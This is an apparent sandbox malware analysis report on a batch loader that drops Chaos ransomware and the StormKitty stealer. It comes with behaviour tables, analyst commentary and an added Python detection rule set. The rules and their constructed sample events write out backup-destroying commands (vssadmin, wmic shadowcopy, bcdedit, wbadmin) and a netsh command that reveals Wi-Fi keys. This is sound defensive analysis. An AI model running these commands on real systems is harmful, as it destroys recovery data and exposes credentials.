Malware Analysis Report

2025-04-13 21:19

Sample ID 250324-epe7aswwaz
Target fix (4).bat
SHA256 50c4082ed4c65e96649e53ba20fec89ead550d4774901dcccaf562db79a9e3e4
Tags
chaos stormkitty collection credential_access defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

50c4082ed4c65e96649e53ba20fec89ead550d4774901dcccaf562db79a9e3e4

Threat Level: Known bad

The file fix (4).bat was found to be: Known bad.

Malicious Activity Summary

chaos stormkitty collection credential_access defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer

The batch file is a loader for two payloads dropped into %TEMP%. The behavioral tables below attribute the ransomware-side host changes (the Startup drop, the wallpaper change, the desktop.ini modifications across every user profile and a second volume, the clipboard listener) to C:\Users\Admin\AppData\Roaming\svchost.exe, which C:\Users\Admin\AppData\Local\Temp\build.exe launches; the shadow copy, bcdedit and wbadmin rows record only the utilities themselves. The stealer-side activity (Outlook profile keys, the netsh Wi-Fi profile dump through a 32-bit cmd.exe, Chrome started as a child process, CPU fingerprinting) is attributed to C:\Users\Admin\AppData\Local\Temp\kernelv.exe. Both executables are started by the batch file's cmd.exe, which first runs PowerShell; PowerShell is the process logged downloading PE files. The Network and Files sections named in the table of contents are not part of this export.

Chaos family

Chaos

Chaos Ransomware

StormKitty

Stormkitty family

StormKitty payload

Deletes shadow copies

Modifies boot configuration data using bcdedit

Disables Task Manager via registry modification

Uses browser remote debugging

Blocklisted process makes network request

Deletes backup catalog

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Drops desktop.ini file(s)

Accesses Microsoft Outlook profiles

Command and Scripting Interpreter: PowerShell

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Sets desktop wallpaper using registry

Drops file in Windows directory

Hide Artifacts: Ignore Process Interrupts

System Network Configuration Discovery: Wi-Fi Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Interacts with shadow copies

Suspicious use of WriteProcessMemory

outlook_win_path

Runs net.exe

Uses Volume Shadow Copy service COM API

Opens file in notepad (likely ransom note)

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Enumerates system info in registry

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

outlook_office_path

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-24 04:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-24 04:06

Reported

2025-03-24 04:09

Platform

win11-20250313-en

Max time kernel

109s

Max time network

117s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fix (4).bat"

Signatures

Chaos

ransomware chaos

Chaos Ransomware

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Chaos family

chaos

StormKitty

stealer stormkitty

StormKitty payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Stormkitty family

stormkitty

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Deletes backup catalog

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A

Disables Task Manager via registry modification

defense_evasion

Downloads MZ/PE file

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\readme.txt | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A

svchost.url is an Internet-shortcut file in the per-user Startup folder, so whatever it points to is launched at every logon of this user; that is the persistence recorded here. readme.txt in the same folder is opened at logon as well, which is consistent with the ransom note that NOTEPAD.EXE is later seen displaying. Note the writer: a binary named svchost.exe running from %APPDATA%, not from C:\Windows\System32.

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\kernelv.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\kernelv.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\kernelv.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\kernelv.exe | N/A

The 9375CFF0413111d3B88A00104B2A6676 subkey is where Outlook keeps per-account settings: server names, usernames and, for POP/IMAP/SMTP accounts, the encrypted stored password. kernelv.exe probes it under the Office 15.0, Office 16.0 and legacy Windows Messaging Subsystem paths so that it finds the profile whichever Outlook version wrote it.

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops desktop.ini file(s)

Description | Indicator | Process | Target
All 64 rows have Description "File opened for modification", Process C:\Users\Admin\AppData\Roaming\svchost.exe and Target N/A. The Indicator (path) column is:
C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini
C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini
C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\Admin\Videos\desktop.ini
C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini
C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini
C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini
C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini
C:\Users\Admin\Documents\desktop.ini
C:\Users\Admin\Favorites\desktop.ini
C:\Users\Public\Pictures\desktop.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini
C:\Users\Admin\Contacts\desktop.ini
C:\Users\Admin\OneDrive\desktop.ini
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini
C:\Users\Public\desktop.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\Users\Admin\Favorites\Links\desktop.ini
C:\Users\Admin\Saved Games\desktop.ini
C:\Users\Public\AccountPictures\desktop.ini
C:\Users\Public\Libraries\desktop.ini
F:\$RECYCLE.BIN\S-1-5-21-1136229799-3442283115-138161576-1000\desktop.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
C:\Users\Admin\Music\desktop.ini
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini
C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini
C:\Users\Admin\Links\desktop.ini
C:\Users\Admin\Pictures\Saved Pictures\desktop.ini
C:\Users\Admin\Desktop\desktop.ini
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini
C:\Users\Public\Downloads\desktop.ini
C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\Admin\Pictures\desktop.ini
C:\Users\Admin\Pictures\Camera Roll\desktop.ini
C:\Users\Admin\Searches\desktop.ini
C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini
C:\Users\Public\Documents\desktop.ini
C:\Users\Public\Desktop\desktop.ini
C:\Users\Public\Music\desktop.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini
C:\Users\Admin\Downloads\desktop.ini
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini

The paths cover the Admin, Default, Public and All Users profiles and F:\$RECYCLE.BIN on a second volume: one process opening desktop.ini for modification in every one of those folders is a file-system walk across all profiles and all mounted drives, and desktop.ini shows up simply because it is the one file present in each folder.

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ipinfo.io | N/A | N/A
N/A | ipinfo.io | N/A | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\xboyrybqu.jpg" | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

The process is Chrome itself, which kernelv.exe launched (see the WriteProcessMemory table); the row records the browser's own use of the system temp directory, not the sample writing into the Windows directory.

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A

Treat this T1546.007 tag as a false positive. netsh.exe reads HKLM\SOFTWARE\Microsoft\NetSh (the WOW6432Node view here, because the 32-bit netsh ran) at every start to locate its helper DLLs; the rows show opens, queries and value enumeration only, never a value being set, so no helper DLL was registered. Both netsh instances were started by a 32-bit cmd.exe under kernelv.exe alongside chcp.com and findstr.exe, which is the shape of a Wi-Fi profile dump, not of a persistence install.

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\kernelv.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A

Console processes read the NLS\Language key routinely during locale and code-page set-up, and chcp.com exists to change the code page; these rows are the side-effect of kernelv.exe running chcp.com, netsh.exe and findstr.exe through a 32-bit cmd.exe. The language-discovery tag on its own is weak evidence; the process combination behind it is the useful signal.

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A
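
Taken one at a time, the signatures above are noisy: netsh wlan queries, wallpaper changes and even vssadmin runs happen legitimately. Correlated within a few minutes on one host they are not. What follows is an added example, not code from the sandbox vendor or from the sample, of correlating them over Sysmon-style process, file and registry events. Everything in it is an assumption about this detonation: the report records the utilities but not their command lines, so the patterns encode the publicly documented Chaos-builder and StormKitty command lines (vssadmin delete shadows, wmic shadowcopy delete, bcdedit recoveryenabled no, wbadmin delete catalog, netsh wlan show profile), the Task Manager rule assumes the standard Policies\System\DisableTaskMgr policy value, and the event records (with `ts` in epoch seconds) are constructed.

```python
"""Correlate the behaviours this report lists over Sysmon-style events.
Editor-added example: not code from the sandbox vendor or the malware.
The events below are constructed.  Their command lines and registry paths
are assumptions drawn from publicly documented Chaos-builder and StormKitty
behaviour; this export records the processes but not their command lines."""
import re
from collections import defaultdict

def _cmd(*patterns):
    """Process rule: every pattern must match the command line."""
    rx = [re.compile(p, re.IGNORECASE) for p in patterns]
    return lambda e: e["type"] == "process" and all(r.search(e["cmd"]) for r in rx)

def _reg(key_pattern, value_pattern=".*"):
    """Registry-set rule: key and written value must both match."""
    k, v = re.compile(key_pattern, re.I), re.compile(value_pattern, re.I)
    return lambda e: e["type"] == "registry" and bool(k.search(e["key"]) and v.search(str(e["value"])))

def _file(pattern):
    """File-create rule on the full path."""
    rx = re.compile(pattern, re.I)
    return lambda e: e["type"] == "file" and bool(rx.search(e["path"]))

def _masquerade(e):
    """System-binary name running outside System32/SysWOW64, like the
    dropped %APPDATA%\\svchost.exe in this report."""
    return (e["type"] == "process"
            and re.search(r"\\(svchost|csrss|lsass|winlogon|dllhost)\.exe$", e["image"], re.I) is not None
            and re.search(r"\\Windows\\(System32|SysWOW64)\\", e["image"], re.I) is None)

# (rule name, weight, predicate).  Weights are this example's own tuning.
RULES = [
    ("vssadmin deletes shadow copies", 4, _cmd(r"\bvssadmin(\.exe)?\b", r"delete\s+shadows")),
    ("wmic deletes shadow copies", 4, _cmd(r"\bwmic(\.exe)?\b", r"shadowcopy\s+delete")),
    ("bcdedit disables recovery", 3,
     _cmd(r"\bbcdedit(\.exe)?\b", r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures")),
    ("wbadmin deletes backup catalog", 3, _cmd(r"\bwbadmin(\.exe)?\b", r"delete\s+catalog")),
    ("netsh dumps Wi-Fi profiles", 2, _cmd(r"\bnetsh(\.exe)?\b", r"wlan\s+show\s+profile")),
    ("Task Manager disabled", 2, _reg(r"Policies\\System\\DisableTaskMgr$", r"^1$")),
    ("wallpaper set from Temp", 2, _reg(r"Control Panel\\Desktop\\Wallpaper$", r"\\AppData\\Local\\Temp\\")),
    ("shortcut dropped in Startup", 3, _file(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.url$")),
    ("system-binary name outside System32", 3, _masquerade),
]
THRESHOLD = 8  # a lone netsh query or wallpaper change must not page anyone

def match_rules(event):
    """Names of every rule one event satisfies."""
    return [name for name, _w, pred in RULES if pred(event)]

def score_hosts(events, window_s=300):
    """Per host, the heaviest set of distinct rules whose events fall inside
    one window_s-second window.  Returns {host: (score, [rule names])} for
    hosts at or above THRESHOLD.  A rule counts once however often it fires,
    so repetition of one noisy rule cannot reach the threshold."""
    weight = {name: w for name, w, _p in RULES}
    hits = defaultdict(list)
    for e in events:
        for name in match_rules(e):
            hits[e["host"]].append((e["ts"], name))
    result = {}
    for host, rows in hits.items():
        rows.sort()
        best = (0, [])
        for i, (t0, _n) in enumerate(rows):
            names = {n for t, n in rows[i:] if t - t0 <= window_s}
            score = sum(weight[n] for n in names)
            if score > best[0]:
                best = (score, sorted(names))
        if best[0] >= THRESHOLD:
            result[host] = best
    return result

# Constructed telemetry, not taken from the report: WS01 mirrors the
# detonation's sequence, WS02 is a help-desk session that only ran netsh.
_P, _R, _F = "process", "registry", "file"
SAMPLE_EVENTS = [
    {"host": "WS01", "ts": 100, "type": _P, "image": r"C:\Windows\System32\vssadmin.exe", "cmd": "vssadmin delete shadows /all /quiet"},
    {"host": "WS01", "ts": 101, "type": _P, "image": r"C:\Windows\System32\wbem\WMIC.exe", "cmd": "wmic shadowcopy delete"},
    {"host": "WS01", "ts": 102, "type": _P, "image": r"C:\Windows\System32\bcdedit.exe", "cmd": "bcdedit /set {default} recoveryenabled no"},
    {"host": "WS01", "ts": 103, "type": _P, "image": r"C:\Windows\System32\wbadmin.exe", "cmd": "wbadmin delete catalog -quiet"},
    {"host": "WS01", "ts": 104, "type": _P, "image": r"C:\Users\Admin\AppData\Roaming\svchost.exe", "cmd": "svchost.exe"},
    {"host": "WS01", "ts": 105, "type": _F, "path": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url"},
    {"host": "WS01", "ts": 106, "type": _R, "key": r"HKCU\Control Panel\Desktop\Wallpaper", "value": r"C:\Users\Admin\AppData\Local\Temp\xboyrybqu.jpg"},
    {"host": "WS01", "ts": 107, "type": _R, "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "value": 1},
    {"host": "WS01", "ts": 108, "type": _P, "image": r"C:\Windows\SysWOW64\netsh.exe", "cmd": "netsh wlan show profile"},
    {"host": "WS02", "ts": 500, "type": _P, "image": r"C:\Windows\System32\netsh.exe", "cmd": "netsh wlan show profile name=Corp key=clear"},
]

if __name__ == "__main__":
    for host, (score, rules) in score_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: score {score}")
        for rule in rules:
            print(f"  - {rule}")
```

Run stand-alone it reports WS01 with all nine rules and stays silent on WS02, whose single netsh query scores 2 against a threshold of 8. The design point is that distinct rules, not raw hit counts, drive the score: the report logs build.exe enumerating processes 25 times, and a counter that rewarded repetition would let any one chatty behaviour trip the alert on its own.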

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A

The reader is vds.exe, the Windows Virtual Disk Service, which is started on demand by disk-management operations; it is not the sample. The values are still worth a look: the CD-ROM identifies itself as Ven_QEMU Prod_QEMU_DVD-ROM, so the detonation environment is QEMU-based, and a sample with anti-VM checks could learn that from the same key.

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\kernelv.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\kernelv.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

These rows belong to the Chrome instance that kernelv.exe launched; the browser reads the BIOS manufacturer and product name for its own hardware reporting. Contrast the CentralProcessor rows above, which are read by kernelv.exe itself and are the stealer's host profiling.

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\MuiCache | C:\Windows\system32\BackgroundTransferHost.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\system32\BackgroundTransferHost.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\system32\BackgroundTransferHost.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\system32\BackgroundTransferHost.exe | N/A

Only the first row is the sample (the dropped svchost.exe creating its Local Settings classes key). The BackgroundTransferHost.exe rows are the Windows background transfer service populating the AppContainer cache for the microsoftwindows.client.cbs package and are operating-system noise.

Opens file in notepad (likely ransom note)

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A

Runs net.exe

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A

AddClipboardFormatListener registers the calling window for WM_CLIPBOARDUPDATE, so the dropped svchost.exe is notified of every clipboard change: clipboard monitoring by the ransomware process, over and above the file encryption.

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Rows logged
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 8
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A | 25
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\kernelv.exe | N/A | 21
N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A | 10

(64 rows in the original, collapsed here by process.)

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target | Rows logged
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 4
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A | 1
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\kernelv.exe | N/A | 1
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A | 1
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A | 4
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A | 4
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A | 1
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A | 1
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A | 1
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A | 1
Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A | 1
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A | 1
Token: 21 privileges, listed below | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A | 2 x 21

(63 rows in the original, collapsed here by token and process.) Each of the two WMIC.exe invocations enabled, in LUID order: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and the LUIDs 33, 34, 35 and 36 that the sandbox left unresolved, which on Windows are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege. That is the full privilege set of an elevated administrator token enabled wholesale, which is how WMIC normally sets up its token; it says nothing about what the WMIC commands did, and their command lines are not in this export. The rows that matter are the SeDebugPrivilege enables by powershell.exe and by the three dropped binaries, and the appearance of vssvc.exe and wbengine.exe, the Volume Shadow Copy and Block Level Backup Engine services, woken by the vssadmin and wbadmin calls.

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Both rows are Chrome locating the shell tray window for its own taskbar integration; the only link to the sample is that kernelv.exe started the browser.

Suspicious use of WriteProcessMemory

Description | Indicator | Process (writer) | Target | Rows logged
PID 4876 wrote to memory of 668 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe | 2
PID 668 wrote to memory of 232 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe | 2
PID 4876 wrote to memory of 3396 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 2
PID 4876 wrote to memory of 5088 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 2
